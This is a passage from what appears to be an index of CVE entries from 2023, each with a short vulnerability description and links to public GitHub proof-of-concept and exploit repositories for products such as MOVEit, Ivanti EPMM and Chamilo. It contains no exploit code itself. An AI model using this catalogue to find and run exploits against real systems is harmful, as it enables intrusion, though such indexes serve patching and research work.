CloudPanel v2.2.2 allows attackers to execute a path traversal.
- [0xWhoami35/CloudPanel-CVE-2023-33747](https://github.com/0xWhoami35/CloudPanel-CVE-2023-33747)
### CVE-2023-33768 (2023-07-13)
Incorrect signature verification of the firmware during the Device Firmware Update process of Belkin Wemo Smart Plug WSP080 v1.2 allows attackers to cause a Denial of Service (DoS) via a crafted firmware file.
- [purseclab/CVE-2023-33768](https://github.com/purseclab/CVE-2023-33768)
- [Fr0stM0urne/CVE-2023-33768](https://github.com/Fr0stM0urne/CVE-2023-33768)
### CVE-2023-33781 (2023-06-07)
An issue in D-Link DIR-842V2 v1.0.3 allows attackers to execute arbitrary commands via importing a crafted file.
- [s0tr/CVE-2023-33781](https://github.com/s0tr/CVE-2023-33781)
### CVE-2023-33782 (2023-06-07)
D-Link DIR-842V2 v1.0.3 was discovered to contain a command injection vulnerability via the iperf3 diagnostics function.
- [s0tr/CVE-2023-33782](https://github.com/s0tr/CVE-2023-33782)
### CVE-2023-33802 (2023-07-26)
A buffer overflow in SumatraPDF Reader v3.4.6 allows attackers to cause a Denial of Service (DoS) via a crafted text file.
- [CDACesec/CVE-2023-33802](https://github.com/CDACesec/CVE-2023-33802)
### CVE-2023-33817 (2023-06-13)
hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability.
- [leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5](https://github.com/leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5)
### CVE-2023-33829 (2023-05-24)
A stored cross-site scripting (XSS) vulnerability in Cloudogu GmbH SCM Manager v1.2 to v1.60 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description text field.
- [n3gox/CVE-2023-33829](https://github.com/n3gox/CVE-2023-33829)
- [3yujw7njai/CVE-2023-33829-POC](https://github.com/3yujw7njai/CVE-2023-33829-POC)
### CVE-2023-33831 (2023-09-18)
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
- [rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831](https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831)
- [btar1gan/exploit_CVE-2023-33831](https://github.com/btar1gan/exploit_CVE-2023-33831)
### CVE-2023-33902 (2023-07-12)
In bluetooth service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.
- [uthrasri/CVE-2023-33902_single_file](https://github.com/uthrasri/CVE-2023-33902_single_file)
### CVE-2023-33977 (2023-06-06)
Kiwi TCMS is an open source test management system for both manual and automated testing. Kiwi TCMS allows users to upload attachments to test plans, test cases, etc. Earlier versions of Kiwi TCMS had introduced upload validators in order to prevent potentially dangerous files from being uploaded and Content-Security-Policy definition to prevent cross-site-scripting attacks. The upload validation checks were not 100% robust which left the possibility to circumvent them and upload a potentially dangerous file which allows execution of arbitrary JavaScript in the browser. Additionally we've discovered that Nginx's `proxy_pass` directive will strip some headers negating protections built into Kiwi TCMS when served behind a reverse proxy. This issue has been addressed in version 12.4. Users are advised to upgrade. Users unable to upgrade who are serving Kiwi TCMS behind a reverse proxy should make sure that additional header values are still passed to the client browser. If they aren't redefining them inside the proxy configuration.
- [mnqazi/CVE-2023-33977](https://github.com/mnqazi/CVE-2023-33977)
### CVE-2023-34034 (2023-07-19)
Using "**" as a pattern in Spring Security configuration \nfor WebFlux creates a mismatch in pattern matching between Spring \nSecurity and Spring WebFlux, and the potential for a security bypass.\n\n
- [hotblac/cve-2023-34034](https://github.com/hotblac/cve-2023-34034)
### CVE-2023-34035 (2023-07-18)
Spring Security versions 5.8 prior to 5.8.5, 6.0 prior to 6.0.5, and 6.1 prior to 6.1.2 could be susceptible to authorization rule misconfiguration if the application uses requestMatchers(String) and multiple servlets, one of them being Spring MVC’s DispatcherServlet. (DispatcherServlet is a Spring MVC component that maps HTTP endpoints to methods on @Controller-annotated classes.)\n\nSpecifically, an application is vulnerable when all of the following are true:\n\n * Spring MVC is on the classpath\n * Spring Security is securing more than one servlet in a single application (one of them being Spring MVC’s DispatcherServlet)\n * The application uses requestMatchers(String) to refer to endpoints that are not Spring MVC endpoints\n\n\nAn application is not vulnerable if any of the following is true:\n\n * The application does not have Spring MVC on the classpath\n * The application secures no servlets other than Spring MVC’s DispatcherServlet\n * The application uses requestMatchers(String) only for Spring MVC endpoints\n\n\n\n
- [mouadk/CVE-2023-34035-Poc](https://github.com/mouadk/CVE-2023-34035-Poc)
- [jzheaux/cve-2023-34035-mitigations](https://github.com/jzheaux/cve-2023-34035-mitigations)
### CVE-2023-34039 (2023-08-29)
Aria Operations for Networks contains an Authentication Bypass vulnerability due to a lack of unique cryptographic key generation. A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI.
- [sinsinology/CVE-2023-34039](https://github.com/sinsinology/CVE-2023-34039)
- [CharonDefalt/CVE-2023-34039](https://github.com/CharonDefalt/CVE-2023-34039)
- [Cyb3rEnthusiast/CVE-2023-34039](https://github.com/Cyb3rEnthusiast/CVE-2023-34039)
- [syedhafiz1234/CVE-2023-34039](https://github.com/syedhafiz1234/CVE-2023-34039)
- [adminxb/CVE-2023-34039](https://github.com/adminxb/CVE-2023-34039)
### CVE-2023-34040 (2023-08-24)
In Spring for Apache Kafka 3.0.9 and earlier and versions 2.9.10 and earlier, a possible deserialization attack vector existed, but only if unusual configuration was applied. An attacker would have to construct a malicious serialized object in one of the deserialization exception record headers.\n\nSpecifically, an application is vulnerable when all of the following are true:\n\n * The user does not configure an ErrorHandlingDeserializer for the key and/or value of the record\n * The user explicitly sets container properties checkDeserExWhenKeyNull and/or checkDeserExWhenValueNull container properties to true.\n * The user allows untrusted sources to publish to a Kafka topic\n\n\nBy default, these properties are false, and the container only attempts to deserialize the headers if an ErrorHandlingDeserializer is configured. The ErrorHandlingDeserializer prevents the vulnerability by removing any such malicious headers before processing the record.\n\n\n
- [Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040](https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040)
- [pyn3rd/CVE-2023-34040](https://github.com/pyn3rd/CVE-2023-34040)
- [buiduchoang24/CVE-2023-34040](https://github.com/buiduchoang24/CVE-2023-34040)
- [huyennhat-dev/cve-2023-34040](https://github.com/huyennhat-dev/cve-2023-34040)
### CVE-2023-34050 (2023-10-19)
\n\n\n\n\n\n\n\n\n\nIn spring AMQP versions 1.0.0 to\n2.4.16 and 3.0.0 to 3.0.9 , allowed list patterns for deserializable class\nnames were added to Spring AMQP, allowing users to lock down deserialization of\ndata in messages from untrusted sources; however by default, when no allowed\nlist was provided, all classes could be deserialized.\n\n\n\nSpecifically, an application is\nvulnerable if\n\n\n\n\n * the\n SimpleMessageConverter or SerializerMessageConverter is used\n\n * the user\n does not configure allowed list patterns\n\n * untrusted\n message originators gain permissions to write messages to the RabbitMQ\n broker to send malicious content\n\n\n\n\n\n\n\n\n\n
- [X1r0z/spring-amqp-deserialization](https://github.com/X1r0z/spring-amqp-deserialization)
### CVE-2023-34051 (2023-10-20)
VMware Aria Operations for Logs contains an authentication bypass vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.\n
- [horizon3ai/CVE-2023-34051](https://github.com/horizon3ai/CVE-2023-34051)
### CVE-2023-34092 (2023-06-01)
Vite provides frontend tooling. Prior to versions 2.9.16, 3.2.7, 4.0.5, 4.1.5, 4.2.3, and 4.3.9, Vite Server Options (`server.fs.deny`) can be bypassed using double forward-slash (//) allows any unauthenticated user to read file from the Vite root-path of the application including the default `fs.deny` settings (`['.env', '.env.*', '*.{crt,pem}']`). Only users explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected, and only files in the immediate Vite project root folder could be exposed. This issue is fixed in [email protected], [email protected], [email protected], [email protected], [email protected], and [email protected].
- [FlapyPan/test-cve-2023-34092](https://github.com/FlapyPan/test-cve-2023-34092)
### CVE-2023-34096 (2023-06-08)
Thruk is a multibackend monitoring webinterface which currently supports Naemon, Icinga, Shinken and Nagios as backends. In versions 3.06 and prior, the file `panorama.pm` is vulnerable to a Path Traversal vulnerability which allows an attacker to upload a file to any folder which has write permissions on the affected system. The parameter location is not filtered, validated or sanitized and it accepts any kind of characters. For a path traversal attack, the only characters required were the dot (`.`) and the slash (`/`). A fix is available in version 3.06.2.
- [galoget/Thruk-CVE-2023-34096](https://github.com/galoget/Thruk-CVE-2023-34096)
### CVE-2023-34152 (2023-05-30)
A vulnerability was found in ImageMagick. This security flaw cause a remote code execution vulnerability in OpenBlob with --enable-pipes configured.
- [overgrowncarrot1/ImageTragick_CVE-2023-34152](https://github.com/overgrowncarrot1/ImageTragick_CVE-2023-34152)
- [SudoIndividual/CVE-2023-34152](https://github.com/SudoIndividual/CVE-2023-34152)
### CVE-2023-34212 (2023-06-12)
The JndiJmsConnectionFactoryProvider Controller Service, along with the ConsumeJMS and PublishJMS Processors, in Apache NiFi 1.8.0 through 1.21.0 allow an authenticated and authorized user to configure URL and library properties that enable deserialization of untrusted data from a remote location.\n\nThe resolution validates the JNDI URL and restricts locations to a set of allowed schemes.\n\nYou are recommended to upgrade to version 1.22.0 or later which fixes this issue.\n\n\n
- [mbadanoiu/CVE-2023-34212](https://github.com/mbadanoiu/CVE-2023-34212)
### CVE-2023-34312 (2023-06-01)
In Tencent QQ through 9.7.8.29039 and TIM through 3.4.7.22084, QQProtect.exe and QQProtectEngine.dll do not validate pointers from inter-process communication, which leads to a write-what-where condition.
- [vi3t1/qq-tim-elevation](https://github.com/vi3t1/qq-tim-elevation)
- [lan1oc/CVE-2023-34312-exp](https://github.com/lan1oc/CVE-2023-34312-exp)
### CVE-2023-34362 (2023-06-02)
In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.
- [deepinstinct/MOVEit_CVE-2023-34362_IOCs](https://github.com/deepinstinct/MOVEit_CVE-2023-34362_IOCs)
- [horizon3ai/CVE-2023-34362](https://github.com/horizon3ai/CVE-2023-34362)
- [sfewer-r7/CVE-2023-34362](https://github.com/sfewer-r7/CVE-2023-34362)
- [kenbuckler/MOVEit-CVE-2023-34362](https://github.com/kenbuckler/MOVEit-CVE-2023-34362)
- [Malwareman007/CVE-2023-34362](https://github.com/Malwareman007/CVE-2023-34362)
- [toorandom/moveit-payload-decrypt-CVE-2023-34362](https://github.com/toorandom/moveit-payload-decrypt-CVE-2023-34362)
- [errorfiathck/MOVEit-Exploit](https://github.com/errorfiathck/MOVEit-Exploit)
- [Chinyemba-ck/MOVEit-CVE-2023-34362](https://github.com/Chinyemba-ck/MOVEit-CVE-2023-34362)
- [glen-pearson/MoveIT-CVE-2023-34362-RCE](https://github.com/glen-pearson/MoveIT-CVE-2023-34362-RCE)
- [aditibv/MOVEit-CVE-2023-34362](https://github.com/aditibv/MOVEit-CVE-2023-34362)
### CVE-2023-34458 (2023-07-13)
mx-chain-go is the official implementation of the MultiversX blockchain protocol, written in golang. When executing a relayed transaction, if the inner transaction failed, it would have increased the inner transaction's sender account nonce. This could have contributed to a limited DoS attack on a targeted account. The fix is a breaking change so a new flag `RelayedNonceFixEnableEpoch` was needed. This was a strict processing issue while validating blocks on a chain. This vulnerability has been patched in version 1.4.17.
- [miguelc49/CVE-2023-34458-2](https://github.com/miguelc49/CVE-2023-34458-2)
- [miguelc49/CVE-2023-34458-1](https://github.com/miguelc49/CVE-2023-34458-1)
- [miguelc49/CVE-2023-34458-3](https://github.com/miguelc49/CVE-2023-34458-3)
### CVE-2023-34468 (2023-06-12)
The DBCPConnectionPool and HikariCPConnectionPool Controller Services in Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution.\n\nThe resolution validates the Database URL and rejects H2 JDBC locations.\n\nYou are recommended to upgrade to version 1.22.0 or later which fixes this issue.\n\n\n
- [mbadanoiu/CVE-2023-34468](https://github.com/mbadanoiu/CVE-2023-34468)
### CVE-2023-34537 (2023-06-13)
A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.
- [leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5](https://github.com/leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5)
### CVE-2023-34584
- [fu2x2000/-CVE-2023-34584](https://github.com/fu2x2000/-CVE-2023-34584)
### CVE-2023-34598 (2023-06-29)
Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) where it's possible to include the content of several files present in the installation folder in the server's response.
- [maddsec/CVE-2023-34598](https://github.com/maddsec/CVE-2023-34598)
- [Lserein/CVE-2023-34598](https://github.com/Lserein/CVE-2023-34598)
### CVE-2023-34599 (2023-06-29)
Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.
- [maddsec/CVE-2023-34599](https://github.com/maddsec/CVE-2023-34599)
### CVE-2023-34600 (2023-06-20)
Adiscon LogAnalyzer v4.1.13 and before is vulnerable to SQL Injection.
- [costacoco/Adiscon](https://github.com/costacoco/Adiscon)
### CVE-2023-34634 (2023-08-01)
Greenshot 1.2.10 and below allows arbitrary code execution because .NET content is insecurely deserialized when a .greenshot file is opened.
- [radman404/CVE-2023-34634](https://github.com/radman404/CVE-2023-34634)
### CVE-2023-34830 (2023-06-27)
i-doit Open v24 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the timeout parameter on the login page.
- [leekenghwa/CVE-2023-34830---Reflected-XSS-found-in-I-doit-Open-v24-and-below](https://github.com/leekenghwa/CVE-2023-34830---Reflected-XSS-found-in-I-doit-Open-v24-and-below)
### CVE-2023-34835 (2023-06-27)
A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary JavaScript code via a vulnerable delete_file parameter.
- [sahiloj/CVE-2023-34835](https://github.com/sahiloj/CVE-2023-34835)
### CVE-2023-34836 (2023-06-27)
A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a crafted script to the Dtltyp and ListName parameters.
- [sahiloj/CVE-2023-34836](https://github.com/sahiloj/CVE-2023-34836)
### CVE-2023-34837 (2023-06-27)
A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a vulnerable parameter GrpPath.
- [sahiloj/CVE-2023-34837](https://github.com/sahiloj/CVE-2023-34837)
### CVE-2023-34838 (2023-06-27)
A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a crafted script to the Description parameter.
- [sahiloj/CVE-2023-34838](https://github.com/sahiloj/CVE-2023-34838)
### CVE-2023-34839 (2023-06-27)
A Cross Site Request Forgery (CSRF) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows a remote attacker to gain privileges via a Custom CSRF exploit to create new user function in the application.
- [sahiloj/CVE-2023-34839](https://github.com/sahiloj/CVE-2023-34839)
### CVE-2023-34840 (2023-06-30)
angular-ui-notification v0.1.0, v0.2.0, and v0.3.6 was discovered to contain a cross-site scripting (XSS) vulnerability.
- [Xh4H/CVE-2023-34840](https://github.com/Xh4H/CVE-2023-34840)
### CVE-2023-34843 (2023-06-28)
Traggo Server 0.3.0 is vulnerable to directory traversal via a crafted GET request.
- [rootd4ddy/CVE-2023-34843](https://github.com/rootd4ddy/CVE-2023-34843)
### CVE-2023-34845 (2023-06-16)
Bludit v3.14.1 was discovered to contain an arbitrary file upload vulnerability in the component /admin/new-content. This vulnerability allows attackers to execute arbitrary web scripts or HTML via uploading a crafted SVG file. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration).
- [r4vanan/CVE-2023-34845](https://github.com/r4vanan/CVE-2023-34845)
### CVE-2023-34852 (2023-06-15)
PublicCMS <=V4.0.202302 is vulnerable to Insecure Permissions.
- [funny-kill/CVE-2023-34852](https://github.com/funny-kill/CVE-2023-34852)
### CVE-2023-34853 (2023-08-22)
Buffer Overflow vulnerability in Supermicro motherboard X12DPG-QR 1.4b allows local attackers to hijack control flow via manipulation of SmcSecurityEraseSetupVar variable.
- [risuxx/CVE-2023-34853](https://github.com/risuxx/CVE-2023-34853)
### CVE-2023-34924 (2023-06-26)
H3C Magic B1STW B1STV100R012 was discovered to contain a stack overflow via the function SetAPInfoById. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.
- [ChrisL0tus/CVE-2023-34924](https://github.com/ChrisL0tus/CVE-2023-34924)
### CVE-2023-34960 (2023-08-01)
A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.
- [Aituglo/CVE-2023-34960](https://github.com/Aituglo/CVE-2023-34960)
- [Jenderal92/CHAMILO-CVE-2023-34960](https://github.com/Jenderal92/CHAMILO-CVE-2023-34960)
- [YongYe-Security/CVE-2023-34960](https://github.com/YongYe-Security/CVE-2023-34960)
- [ThatNotEasy/CVE-2023-34960](https://github.com/ThatNotEasy/CVE-2023-34960)
- [Mantodkaz/CVE-2023-34960](https://github.com/Mantodkaz/CVE-2023-34960)
- [tucommenceapousser/CVE-2023-34960-ex](https://github.com/tucommenceapousser/CVE-2023-34960-ex)
- [dvtarsoul/ChExp](https://github.com/dvtarsoul/ChExp)
### CVE-2023-34965 (2023-06-13)
SSPanel-Uim 2023.3 does not restrict access to the /link/ interface which can lead to a leak of user information.
- [AgentY0/CVE-2023-34965](https://github.com/AgentY0/CVE-2023-34965)
### CVE-2023-34992 (2023-10-10)
A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.0.0 and 6.7.0 through 6.7.5 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.1 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via crafted API requests.
- [horizon3ai/CVE-2023-34992](https://github.com/horizon3ai/CVE-2023-34992)
- [d0rb/CVE-2023-34992-Checker](https://github.com/d0rb/CVE-2023-34992-Checker)
### CVE-2023-35001 (2023-07-05)
Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability; nft_byteorder poorly handled vm register contents when CAP_NET_ADMIN is in any user or network namespace
- [synacktiv/CVE-2023-35001](https://github.com/synacktiv/CVE-2023-35001)
- [syedhafiz1234/nftables-oob-read-write-exploit-CVE-2023-35001-](https://github.com/syedhafiz1234/nftables-oob-read-write-exploit-CVE-2023-35001-)
- [mrbrelax/Exploit_CVE-2023-35001](https://github.com/mrbrelax/Exploit_CVE-2023-35001)
### CVE-2023-35078 (2023-07-25)
An authentication bypass vulnerability in Ivanti EPMM allows unauthorized users to access restricted functionality or resources of the application without proper authentication.
- [vchan-in/CVE-2023-35078-Exploit-POC](https://github.com/vchan-in/CVE-2023-35078-Exploit-POC)
- [lager1/CVE-2023-35078](https://github.com/lager1/CVE-2023-35078)
- [raytheon0x21/CVE-2023-35078](https://github.com/raytheon0x21/CVE-2023-35078)
- [synfinner/CVE-2023-35078](https://github.com/synfinner/CVE-2023-35078)
- [emanueldosreis/nmap-CVE-2023-35078-Exploit](https://github.com/emanueldosreis/nmap-CVE-2023-35078-Exploit)
- [Blue-number/CVE-2023-35078](https://github.com/Blue-number/CVE-2023-35078)
- [0nsec/CVE-2023-35078](https://github.com/0nsec/CVE-2023-35078)
### CVE-2023-35080 (2023-11-14)
A vulnerability has been identified in the Ivanti Secure Access Windows client, which could allow a locally authenticated attacker to exploit a vulnerable configuration, potentially leading to various security risks, including the escalation of privileges, denial of service, or information disclosure.
- [HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation](https://github.com/HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation)
### CVE-2023-35082 (2023-08-15)
An authentication bypass vulnerability in Ivanti EPMM 11.10 and older, allows unauthorized users to access restricted functionality or resources of the application without proper authentication. This vulnerability is unique to CVE-2023-35078 announced earlier.
- [Chocapikk/CVE-2023-35082](https://github.com/Chocapikk/CVE-2023-35082)
### CVE-2023-35086 (2023-07-21)
\nIt is identified a format string vulnerability in ASUS RT-AX56U V2 & RT-AC86U. This vulnerability is caused by directly using input as a format string when calling syslog in logmessage_normal function, in the do_detwan_cgi module of httpd. A remote attacker with administrator privilege can exploit this vulnerability to perform remote arbitrary code execution, arbitrary system operation or disrupt service.\n\nThis issue affects RT-AX56U V2: 3.0.0.4.386_50460; RT-AC86U: 3.0.0.4_386_51529.\n\n
- [tin-z/CVE-2023-35086-POC](https://github.com/tin-z/CVE-2023-35086-POC)
### CVE-2023-35636 (2023-12-12)
Microsoft Outlook Information Disclosure Vulnerability
- [duy-31/CVE-2023-35636](https://github.com/duy-31/CVE-2023-35636)
### CVE-2023-35671 (2023-09-11)
In onHostEmulationData of HostEmulationManager.java, there is a possible way for a general purpose NFC reader to read the full card number and expiry details when the device is in locked screen mode due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
- [MrTiz/CVE-2023-35671](https://github.com/MrTiz/CVE-2023-35671)
### CVE-2023-35674 (2023-09-11)
In onCreate of WindowState.java, there is a possible way to launch a background activity due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
- [Thampakon/CVE-2023-35674](https://github.com/Thampakon/CVE-2023-35674)
- [SpiralBL0CK/Guide-and-theoretical-code-for-CVE-2023-35674](https://github.com/SpiralBL0CK/Guide-and-theoretical-code-for-CVE-2023-35674)
### CVE-2023-35687 (2023-09-11)
In MtpPropertyValue of MtpProperty.h, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
- [pazhanivel07/frameworks_av_AOSP_10_r33_CVE-2023-35687_CVE-2023-35679](https://github.com/pazhanivel07/frameworks_av_AOSP_10_r33_CVE-2023-35687_CVE-2023-35679)
### CVE-2023-35744 (2024-05-03)
D-Link DAP-2622 DDP Configuration Restore Server IPv6 Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20071.
- [ADSSA-IT/CVE-2023-35744](https://github.com/ADSSA-IT/CVE-2023-35744)
### CVE-2023-35793 (2023-09-26)
An issue was discovered in Cassia Access Controller 2.1.1.2303271039. Establishing a web SSH session to gateways is vulnerable to Cross Site Request Forgery (CSRF) attacks.
- [Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH](https://github.com/Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH)
### CVE-2023-35794 (2023-10-27)
An issue was discovered in Cassia Access Controller 2.1.1.2303271039. The Web SSH terminal endpoint (spawned console) can be accessed without authentication. Specifically, there is no session cookie validation on the Access Controller; instead, there is only Basic Authentication to the SSH console.
- [Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking](https://github.com/Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking)
### CVE-2023-35801 (2023-06-23)
A directory traversal vulnerability in Safe Software FME Server before 2022.2.5 allows an attacker to bypass validation when editing a network-based resource connection, resulting in the unauthorized reading and writing of arbitrary files. Successful exploitation requires an attacker to have access to a user account with write privileges. FME Flow 2023.0 is also a fixed version.
- [trustcves/CVE-2023-35801](https://github.com/trustcves/CVE-2023-35801)
### CVE-2023-35803 (2023-10-04)
IQ Engine before 10.6r2 on Extreme Network AP devices has a Buffer Overflow.
- [lachlan2k/CVE-2023-35803](https://github.com/lachlan2k/CVE-2023-35803)
### CVE-2023-35813 (2023-06-17)
Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.
- [aalexpereira/CVE-2023-35813](https://github.com/aalexpereira/CVE-2023-35813)
- [BagheeraAltered/CVE-2023-35813-PoC](https://github.com/BagheeraAltered/CVE-2023-35813-PoC)
### CVE-2023-35828 (2023-06-18)
An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in renesas_usb3_remove in drivers/usb/gadget/udc/renesas_usb3.c.
- [Trinadh465/linux-4.19.72_CVE-2023-35828](https://github.com/Trinadh465/linux-4.19.72_CVE-2023-35828)
### CVE-2023-35840 (2023-06-19)
_joinPath in elFinderVolumeLocalFileSystem.class.php in elFinder before 2.1.62 allows path traversal in the PHP LocalVolumeDriver connector.
- [afine-com/CVE-2023-35840](https://github.com/afine-com/CVE-2023-35840)
### CVE-2023-35843 (2023-06-19)
NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.
- [Lserein/CVE-2023-35843](https://github.com/Lserein/CVE-2023-35843)
- [b3nguang/CVE-2023-35843](https://github.com/b3nguang/CVE-2023-35843)
### CVE-2023-35844 (2023-06-19)
packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they allow .. directory traversal and do not ensure that an intended file extension (.csv or .png) is used.
- [Lserein/CVE-2023-35844](https://github.com/Lserein/CVE-2023-35844)
### CVE-2023-35854 (2023-06-20)
Zoho ManageEngine ADSelfService Plus through 6113 has an authentication bypass that can be exploited to steal the domain controller session token for identity spoofing, thereby achieving the privileges of the domain controller administrator. NOTE: the vendor's perspective is that they have "found no evidence or detail of a security vulnerability."
- [bluestarry33/exp](https://github.com/bluestarry33/exp)
### CVE-2023-35885 (2023-06-20)
CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.
- [datackmy/FallingSkies-CVE-2023-35885](https://github.com/datackmy/FallingSkies-CVE-2023-35885)
- [Chocapikk/CVE-2023-35885](https://github.com/Chocapikk/CVE-2023-35885)
### CVE-2023-35985 (2023-11-27)
An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to a failure to properly validate a dangerous extension. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted malicious site if the browser plugin extension is enabled.
- [SpiralBL0CK/-CVE-2023-35985](https://github.com/SpiralBL0CK/-CVE-2023-35985)
- [N00BIER/CVE-2023-35985](https://github.com/N00BIER/CVE-2023-35985)
### CVE-2023-36003 (2023-12-12)
XAML Diagnostics Elevation of Privilege Vulnerability
- [m417z/CVE-2023-36003-POC](https://github.com/m417z/CVE-2023-36003-POC)
- [baph0m3th/CVE-2023-36003](https://github.com/baph0m3th/CVE-2023-36003)
### CVE-2023-36025 (2023-11-14)
Windows SmartScreen Security Feature Bypass Vulnerability
- [ka7ana/CVE-2023-36025](https://github.com/ka7ana/CVE-2023-36025)
- [J466Y/test_CVE-2023-36025](https://github.com/J466Y/test_CVE-2023-36025)
- [coolman6942o/-EXPLOIT-CVE-2023-36025](https://github.com/coolman6942o/-EXPLOIT-CVE-2023-36025)
### CVE-2023-36076 (2023-09-01)
SQL Injection vulnerability in smanga version 3.1.9 and earlier, allows remote attackers to execute arbitrary code and gain sensitive information via mediaId, mangaId, and userId parameters in php/history/add.php.
- [deIndra/CVE-2023-36076](https://github.com/deIndra/CVE-2023-36076)
### CVE-2023-36085 (2023-10-24)
The sisqualWFM 7.1.319.103 thru 7.1.319.111 for Android, has a host header injection vulnerability in its "/sisqualIdentityServer/core/" endpoint. By modifying the HTTP Host header, an attacker can change webpage links and even redirect users to arbitrary or malicious locations. This can lead to phishing attacks, malware distribution, and unauthorized access to sensitive resources.
- [omershaik0/CVE-2023-36085_SISQUALWFM-Host-Header-Injection](https://github.com/omershaik0/CVE-2023-36085_SISQUALWFM-Host-Header-Injection)
### CVE-2023-36109 (2023-09-20)
Buffer Overflow vulnerability in JerryScript version 3.0, allows remote attackers to execute arbitrary code via ecma_stringbuilder_append_raw component at /jerry-core/ecma/base/ecma-helpers-string.c.
- [Limesss/CVE-2023-36109](https://github.com/Limesss/CVE-2023-36109)
### CVE-2023-36123 (2023-10-06)
Directory Traversal vulnerability in Hex-Dragon Plain Craft Launcher 2 version Alpha 1.3.9, allows local attackers to execute arbitrary code and gain sensitive information.
- [9Bakabaka/CVE-2023-36123](https://github.com/9Bakabaka/CVE-2023-36123)
### CVE-2023-36143 (2023-06-30)
Maxprint Maxlink 1200G v3.4.11E has an OS command injection vulnerability in the "Diagnostic tool" functionality of the device.
- [leonardobg/CVE-2023-36143](https://github.com/leonardobg/CVE-2023-36143)
- [RobinTrigon/CVE-2023-36143](https://github.com/RobinTrigon/CVE-2023-36143)
### CVE-2023-36144 (2023-06-30)
An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.
